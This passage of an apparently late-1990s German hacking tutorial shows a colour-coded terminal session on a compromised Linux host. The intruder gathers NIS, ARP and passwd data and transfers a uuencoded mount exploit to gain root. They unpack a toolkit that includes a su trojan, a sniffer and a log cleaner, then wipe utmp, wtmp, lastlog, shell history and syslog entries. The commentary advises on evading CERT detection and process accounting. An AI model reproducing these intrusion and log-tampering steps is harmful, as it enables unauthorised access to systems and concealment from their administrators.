+<br><font color="#FF0000">johnny&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ttyp4&nbsp;&nbsp;
+6:35pm&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:01&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+w</font>
+<p><font color="#FF0000">victim % ps au</font>
+<br><font color="#FF0000">USER&nbsp;&nbsp; PID %CPU %MEM&nbsp;&nbsp; VSZ&nbsp;&nbsp;
+RSS&nbsp; TT STAT&nbsp; START&nbsp;&nbsp; TIME COMMAND</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 144&nbsp;&nbsp;&nbsp;
+0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 24&nbsp;&nbsp;&nbsp; 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12:12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; mingetty</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 145&nbsp;&nbsp;&nbsp;
+0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8&nbsp;&nbsp;&nbsp;
+2&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+12:12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp;&nbsp;
+mingetty</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 146&nbsp;&nbsp;&nbsp;
+0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 28&nbsp;&nbsp;&nbsp; 3&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 12:12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; mingetty</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 147&nbsp;&nbsp;&nbsp;
+0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;
+4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SW&nbsp;&nbsp;&nbsp; 12:12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; mingetty</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 148&nbsp;&nbsp;&nbsp;
+0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;
+5&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SW&nbsp;&nbsp;&nbsp; 12:12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; mingetty</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 149&nbsp;&nbsp;&nbsp;
+0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+800&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0&nbsp;&nbsp;&nbsp;
+6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; SW&nbsp;&nbsp;&nbsp; 12:12&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; mingetty</font>
+<br><font color="#FF0000">johnny 1641&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+4.6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1748&nbsp;&nbsp; 1064&nbsp; p4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 18:35&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0:00&nbsp;&nbsp;&nbsp;&nbsp; -bash</font>
+<br><font color="#FF0000">johnny 1691&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+1.7&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 928&nbsp;&nbsp;&nbsp; 408&nbsp;&nbsp;
+p4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; R&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+18:57&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp;&nbsp;
+ps au</font>
+<p><font color="#000000">Hier ueberpruefen wir nochmal genau ob nicht doch
+ein Admin eingeloggt ist, der <b>fingerd</b> modifiziert oder seine Eintraege
+aus </font><font color="#33FF33">w</font><font color="#000000">/</font><font color="#33FF33">utmp</font><font color="#000000">[</font><font color="#33FF33">x</font><font color="#000000">]
+geloescht hat. Wie es aussieht ist 'johnny' der einzige User, der online
+ist.</font>
+<p><font color="#FF0000">victim % domainname</font>
+<br><font color="#FF0000">korn.domain.nis</font>
+<br><font color="#FF0000">victim %&nbsp; ypwhich</font>
+<br><font color="#FF0000">chi</font>
+<br><font color="#FF0000">victim % ypcat ypservers</font>
+<br><font color="#FF0000">chi</font>
+<br><font color="#FF0000">fieldy</font>
+<p><font color="#000000">So, als erstes holen wir uns Infos ueber deren
+NIS. Den NIS-Domainname und den NIS-Server koennen wir spaeter benutzen
+um diverse NIS-Maps zu transferieren; z.B. die <i>Passwd-Map </i>nachdem
+wir rausgeflogen sind. NIS ist fast zu 100% in den Domains installiert.
+Nur wenige benutzen rdist, NIS+ oder DCE. Ein Program, das uns den Zugriff
+auf den NIS-Server ermoeglich heisst <b>ypx</b>.</font>
+<p><font color="#FF0000">victim% arp -a</font>
+<br><font color="#FF0000">fred.domain.com (10.255.0.4) at 00:C0:24:A4:3B:B2
+[ether] on eth0</font>
+<br><font color="#FF0000">bambam.domain.com (10.255.0.3) at 00:00:0C:A1:32:F2
+[ether] on eth0</font>
+<br><font color="#FF0000">hombre.domain.com (10.255.0.43) at 08:00:02:C1:FB:32
+[ether] on eth0</font>
+<br><font color="#FF0000">deep.domain.com (10.255.0.24) at 00:05:02:E1:12:B2
+[ether] on eth0</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#000000">Ein kurzer Blick in den ARP Cache des Rechners
+zeigt uns welche Hardware im Netz verwendet wird. Die ersten drei Bytes
+der Ethernet-Adresse sind ein Indikator fuer den Hersteller der Netzkarte.</font>
+<br><font color="#000000">fred -> unbekannt, evtl. PC</font>
+<br><font color="#000000">bambam -> Cisco Router</font>
+<br><font color="#000000">hombre -> Sun Microsystems</font>
+<br><font color="#000000">deep -> Apple Mac.</font>
+<br><font color="#000000">Natuerlich gibt's noch andere bekannte Hersteller:
+HP, SGI, Cray...</font>
+<p><font color="#FF0000">victim% uname -a</font>
+<br><font color="#FF0000">Linux wallace 2.0.33 #4 Sun Jul 6 11:43:22 MEST
+1998 686 unknown</font>
+<br><font color="#FF0000">victim % ypcat passwd</font>
+<br><font color="#FF0000">proj:FbxcM/NyIxf7w:501:100:Project Account:/home/proj:/bin/bash</font>
+<br><font color="#FF0000">test:x:502:100:Test Account:/home/test:/bin/bash</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % cat /etc/passwd</font>
+<br><font color="#FF0000">root:x:0:0:root:/root:/bin/bash</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % ypcat group</font>
+<br><font color="#FF0000">root:x:0:root</font>
+<br><font color="#FF0000">bin:x:1:root,bin,daemon</font>
+<br><font color="#FF0000">daemon:x:2:</font>
+<br><font color="#FF0000">tty:x:5:</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % cat /etc/group</font>
+<br><font color="#FF0000">root:x:0:root</font>
+<br><font color="#FF0000">bin:x:1:root,bin,daemon</font>
+<br><font color="#FF0000">daemon:x:2:</font>
+<br><font color="#FF0000">tty:x:5:</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % ypcat hosts</font>
+<br><font color="#FF0000">127.0.0.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+localhost</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % cat /etc/hosts</font>
+<br><font color="#FF0000">127.0.0.1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+localhost</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % cat /etc/syslog.conf</font>
+<br><font color="#FF0000"># /etc/syslog.conf - Configuration file for syslogd(8)</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000"># For info about the format of this file, see
+"man syslog.conf".</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000"># print most on tty10</font>
+<br><font color="#FF0000">kern.warn;*.err;authpriv.none&nbsp;&nbsp; /dev/tty10</font>
+<br><font color="#FF0000">*.emerg&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+*</font>
+<br><font color="#FF0000">[...]</font>
+<p><font color="#FF0000">victim % cat&nbsp; /etc/inetd.conf</font>
+<br><font color="#FF0000"># See "man 8 inetd" for more information.</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000"># If you make changes to this file, either reboot
+your machine or send the</font>
+<br><font color="#FF0000"># inetd a HUP signal:</font>
+<br><font color="#FF0000"># Do a "ps x" as root and look up the pid of
+inetd. Then do a</font>
+<br><font color="#FF0000"># "kill -HUP &lt;pid of inetd>".</font>
+<br><font color="#FF0000"># The inetd will re-read this file whenever it
+gets that signal.</font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000"># &lt;service_name> &lt;sock_type> &lt;proto>
+&lt;flags> &lt;user> &lt;server_path> &lt;args></font>
+<br><font color="#FF0000">#</font>
+<br><font color="#FF0000"># echo&nbsp; stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp;
+nowait&nbsp; root&nbsp;&nbsp;&nbsp; internal</font>
+<br><font color="#FF0000"># echo&nbsp; dgram&nbsp;&nbsp; udp&nbsp;&nbsp;&nbsp;&nbsp;
+wait&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp; internal</font>
+<br><font color="#FF0000"># discard&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp;
+internal</font>
+<br><font color="#FF0000"># discard&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+dgram&nbsp;&nbsp; udp&nbsp;&nbsp;&nbsp;&nbsp; wait&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp;
+internal</font>
+<br><font color="#FF0000"># daytime&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp;
+internal</font>
+<br><font color="#FF0000"># daytime&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+dgram&nbsp;&nbsp; udp&nbsp;&nbsp;&nbsp;&nbsp; wait&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp;
+internal</font>
+<br><font color="#FF0000"># chargen&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp;
+internal</font>
+<br><font color="#FF0000"># chargen&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+dgram&nbsp;&nbsp; udp&nbsp;&nbsp;&nbsp;&nbsp; wait&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp;
+internal</font>
+<br><font color="#FF0000"># time&nbsp; stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp;
+nowait&nbsp; root&nbsp;&nbsp;&nbsp; internal</font>
+<br><font color="#FF0000"># time&nbsp; dgram&nbsp;&nbsp; udp&nbsp;&nbsp;&nbsp;&nbsp;
+wait&nbsp;&nbsp;&nbsp; root&nbsp;&nbsp;&nbsp; internal</font>
+<br><font color="#FF0000">[...]</font>
+<p>Jetzt haben wir alle Informationen die wir benoetigen um die Log-Verwaltung
+zu analysieren und um unseren Zugriff zu festigen/wiederzuerlangen.
+<p><font color="#FF0000">victim % mkdir /tmp/".. "</font>
+<br><font color="#FF0000">victim % cd /tmp/".. "</font>
+<br><font color="#FF0000">victim % uudecode</font>
+<br><font color="#FF0000">begin 644 mexpl.gz</font>
+<br><font color="#FF0000">M"B,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C</font>
+<br><font color="#FF0000">M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,*(PD)"0D)"0D)</font>
+<br><font color="#FF0000">M"2`@("`@(",*(PD@("`@(%5.25@@26YT97)A8W1I=F4@5&amp;]O;',@-"XR8B!C</font>
+<br><font color="#FF0000">M;VYF:6=U&lt;F%T:6]N(&amp;9I;&amp;4)"2`@("`@(",*(PD@($-O&lt;'ER:6=H="`H8RD@</font>
+<br><font color="#FF0000">M5'5D;W(@2'5L=6)E:2`F($%N9')E:2!0:71I&lt;RP@36%Y(#$Y.30)("`@("`@</font>
+<br><font color="#FF0000">M"2`@("`@(",*(PD)"0D)"0D)"2`@("`@(",*(R,C(R,C(R,C(R,C(R,C(R,C</font>
+<br><font color="#FF0000">M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C</font>
+<br><font color="#FF0000">M(R,C(R,C(R,C(R,C(R,C(PH*"B,*(R!X=&amp;5R;2!C;VYF:6=U&lt;F%T:6]N(&amp;9I</font>
+<br><font color="#FF0000">M;&amp;4@*%@@=VEN9&amp;]W('-Y&lt;W1E;2DN"B,@268@>6]U(&amp;%R92!U&lt;VEN9R!C;VQO</font>
+<br><font color="#FF0000">M&lt;E]X=&amp;5R;2!C;VYS:61E&lt;B!C:&amp;%N9VEN9R!,:6YU>$-O;G-O;&amp;4@86YD"B,@</font>
+<br><font color="#FF0000">M0V]L;W)-;VYI=&amp;]R('1O($].+@HC"@H*(PHC("`M($EF("=,:6YU>$-O;&amp;]R</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">victim % ls -altr</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 2 johnny users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+1024 Jul&nbsp; 6 11:39 .</font>
+<br><font color="#FF0000">drwxrwxrwt&nbsp;&nbsp; 7 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jul&nbsp; 6 11:39
+..</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp; 1 johnny users&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+2345&nbsp; Jul&nbsp; 5&nbsp; 11:41 mexpl.gz</font>
+<br><font color="#FF0000">victim % gunzip *.gz</font>
+<br><font color="#FF0000">victim % chmod u+x mexpl</font>
+<br><font color="#FF0000">victim % mexpl</font>
+<br><font color="#FF0000">bash# whoami</font>
+<br><font color="#FF0000">root</font>
+<br><font color="#FF0000">bash# unset HISTFILE</font>
+<br><font color="#FF0000">bash# rm ~/.bash_history</font>
+<p><font color="#000000">Als erstes haben wir ein Arbeitsdirec. eingerichtet
+und anschliessend wurde das Binary eines mount-Exploits,</font>
+<br><font color="#000000">welches zuvor <b>uuencode</b>'d wurde, uebertragen.</font>
+<br><font color="#000000">Das Transferieren des Images ist recht simpel
+(Verwendung eines Terminalprog.s, keine PPP/IP Verbindung)</font>
+<br><font color="#FF0000">needle > uuencode mexpl.gz mexpl.gz > /dev/modem</font>
+<br><font color="#000000">Nur fuer den Fall, dass ich - aus welchen Gruenden
+auch immer - den Compiler einses Systems nicht benutzen kann, sammel ich
+von meinen Hackertools und Exploits die Binaries der verschiedenen Plattformen
+um sie wie oben gezeigt zu uebertragen.</font>
+<p><font color="#FF0000">bash# uudecode</font>
+<br><font color="#FF0000">begin 644 tools.tar.gz</font>
+<br><font color="#FF0000">M"B,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C</font>
+<br><font color="#FF0000">M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,*(PD)"0D)"0D)</font>
+<br><font color="#FF0000">M"2`@("`@(",*(PD@("`@(%5.25@@26YT97)A8W1I=F4@5&amp;]O;',@-"XR8B!C</font>
+<br><font color="#FF0000">M;VYF:6=U&lt;F%T:6]N(&amp;9I;&amp;4)"2`@("`@(",*(PD@($-O&lt;'ER:6=H="`H8RD@</font>
+<br><font color="#FF0000">M5'5D;W(@2'5L=6)E:2`F($%N9')E:2!0:71I&lt;RP@36%Y(#$Y.30)("`@("`@</font>
+<br><font color="#FF0000">M"2`@("`@(",*(PD)"0D)"0D)"2`@("`@(",*(R,C(R,C(R,C(R,C(R,C(R,C</font>
+<br><font color="#FF0000">M(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C(R,C</font>
+<br><font color="#FF0000">M(R,C(R,C(R,C(R,C(R,C(PH*"B,*(R!X=&amp;5R;2!C;VYF:6=U&lt;F%T:6]N(&amp;9I</font>
+<br><font color="#FF0000">M;&amp;4@*%@@=VEN9&amp;]W('-Y&lt;W1E;2DN"B,@268@>6]U(&amp;%R92!U&lt;VEN9R!C;VQO</font>
+<br><font color="#FF0000">M&lt;E]X=&amp;5R;2!C;VYS:61E&lt;B!C:&amp;%N9VEN9R!,:6YU>$-O;G-O;&amp;4@86YD"B,@</font>
+<br><font color="#FF0000">M0V]L;W)-;VYI=&amp;]R('1O($].+@HC"@H*(PHC("`M($EF("=,:6YU>$-O;&amp;]R</font>
+<br><font color="#FF0000">M0V]N&lt;V]L92&lt;@86YD("=#;VQO&lt;DUO;FET;W(G(&amp;%R92!B;W1H($].+"!;54E4</font>
+<br><font color="#FF0000">M>'AX+4-O;&amp;]R70HC(&amp;1E&lt;V-R:7!T:6]N&lt;R!W:6QL(&amp;)E('5S960N"B,@("T@</font>
+<br><font color="#FF0000">M268@>6]U(&amp;%R92!W;W)K:6YG(&amp;]N(&amp;$@3&amp;EN=7@@&lt;WES=&amp;5M(&amp;)U="!Y;W4@</font>
+<br><font color="#FF0000">[...]</font>
+<br><font color="#FF0000">bash# tar xvzf tools.tar.gz</font>
+<br><font color="#FF0000">searcher</font>
+<br><font color="#FF0000">smeagol_v4.4.4.tar</font>
+<br><font color="#FF0000">clear13b.c</font>
+<br><font color="#FF0000">su-trojan</font>
+<br><font color="#FF0000">linsniffer.c</font>
+<br><font color="#FF0000">srm.c</font>
+<br><font color="#FF0000">ifconfig</font>
+<br><font color="#FF0000">fix</font>
+<br><font color="#FF0000">askhandle</font>
+<br><font color="#FF0000">bash# gcc -o cb clear13b.c</font>
+<br><font color="#FF0000">bash# ./cb johnny</font>
+<br><font color="#FF0000">wtmp ... utmp ... lastlog ... Done!</font>
+<br><font color="#FF0000">Last entry cleared from user johnny</font>
+<br><font color="#FF0000">bash# w</font>
+<br><font color="#FF0000">&nbsp; 3:28pm&nbsp; up&nbsp; 4:33h,&nbsp; 0 users,&nbsp;
+load average: 0.42, 0.15, 0.04</font>
+<br><font color="#FF0000">USER&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; TTY&nbsp;&nbsp;&nbsp;
+LOGIN@&nbsp; IDLE&nbsp;&nbsp; JCPU&nbsp;&nbsp; PCPU&nbsp; WHAT</font>
+<br><font color="#FF0000">bash#</font>
+<p>Ziiip!... Mit <b>clear13b</b> haben wir unsere aktuellen Eintraege aus
+<font color="#33FF33">w</font><font color="#000000">/</font><font color="#33FF33">utmp</font><font color="#000000">[</font><font color="#33FF33">x</font><font color="#000000">]</font>und
+<font color="#33FF33">lastlog</font>
+entfernt. Du solltest darauf aufpassen, dass dein Logcleaner keine Loecher
+in den Dateien, d.h. die Eintraege einfach mit '0' ueberschreibt, hinterlaesst,
+denn die koennen leicht von Programmen des CERT's entdeckt werden.
+<br>Auf <i>Process-Accounting </i>musst du auch acht geben, denn dadurch
+kann der Admin entdecken welche Programme du ausgefuehrt hast. Auch wenn
+die Programme nicht ungewoehnlich aussehen sollten ist es immer noch sehr
+auffaellig, wenn ein User, der keine Eintraege in den regulaeren Logfiles
+besitzt, ein Programm <font color="#000000">aufgerufen</font> hat.
+<br>Zum Glueck wird <i>Process-Accounting </i>nur selten benutzt, da das
+Logfile sehr schnell waechst. Das Logfile heisst <font color="#33FF33">acct</font>
+oder <font color="#33FF33">pacct</font> und befindet sich mit den anderen
+Logfiles im selben Direc..
+<br>Auf besonders schnellen/grossen Rechnern (Cray) ist das <i>Process-Accounting</i>
+fast immer aktiv, da hier die User fuer ihre Rechenzeit bezahlen muessen.
+<p><font color="#FF0000">bash# cd /var/log</font>
+<br><font color="#FF0000">bash# ls -altr</font>
+<br><font color="#FF0000">total 838</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp; 20 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 19:58
+..</font>
+<br><font color="#FF0000">-rw-r-----&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0 May 28 21:01 news</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 199 May 28 21:12
+httpd.error_log</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0 May 28 21:14 httpd.access_log</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 3925 May 28 21:53
+Config.bootup</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp;&nbsp; 2 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 Jun 14 11:29
+.</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1871 Jul&nbsp; 7 09:04
+boot.msg</font>
+<br><font color="#FF0000">-rw-r-----&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 519707 Jul&nbsp; 7 09:04 warn</font>
+<br><font color="#FF0000">-rw-r-----&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 15842 Jul&nbsp; 7 09:04
+mail</font>
+<br><font color="#FF0000">-rw-------&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 24 Jul&nbsp;
+7 13:42 faillog</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 16096 Jul&nbsp; 7 13:42
+lastlog</font>
+<br><font color="#FF0000">-rw-r--r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 92454 Jul&nbsp; 7 13:42
+messages</font>
+<br><font color="#FF0000">-rw-rw-r--&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+tty&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 207984 Jul&nbsp; 7 13:42
+wtmp</font>
+<br><font color="#FF0000">bash# grep source.ass *</font>
+<br><font color="#FF0000">messages: Jul&nbsp; 7 13:42:39 wallace in.telnetd[401]:
+connect from source.ass.com</font>
+<br><font color="#FF0000">bash# fuser messages</font>
+<br><font color="#FF0000">messages:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+85</font>
+<br><font color="#FF0000">bash# ps aux 85</font>
+<br><font color="#FF0000">&nbsp;&nbsp;&nbsp; USER&nbsp;&nbsp; PID %CPU
+%MEM&nbsp;&nbsp; VSZ&nbsp;&nbsp; RSS&nbsp; TT STAT&nbsp; START&nbsp;&nbsp;
+TIME COMMAND</font>
+<br><font color="#FF0000">root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+85&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0.0&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0.8&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 836&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+196&nbsp;&nbsp; ?&nbsp;&nbsp;&nbsp; S&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+09:04&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 0:00&nbsp;&nbsp;&nbsp; /usr/sbin/syslogd</font>
+<br><font color="#FF0000">bash# grep in.rlogind *</font>
+<br><font color="#FF0000">messages: Jul&nbsp; 7 13:41:56 wallace in.rlogind[384]:
+connect from johnny@victim.domain.com</font>
+<br><font color="#FF0000">bash# grep -v source.ass.com messages > m</font>
+<br><font color="#FF0000">bash# grep -v "Jul&nbsp; 7 13:41:56" m > messages</font>
+<br><font color="#FF0000">bash# cat /dev/zero > m</font>
+<br><font color="#FF0000">^C</font>
+<br><font color="#FF0000">bash# rm m</font>
+<br><font color="#FF0000">bash# ls -altr</font>
+<br><font color="#FF0000">total 838</font>
+<br><font color="#FF0000">drwxr-xr-x&nbsp; 20 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 1024 May 28 19:58
+..</font>
+<br><font color="#FF0000">-rw-r-----&nbsp;&nbsp; 1 root&nbsp;&nbsp;&nbsp;&nbsp;
+root&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+0 May 28 21:01 news</font>
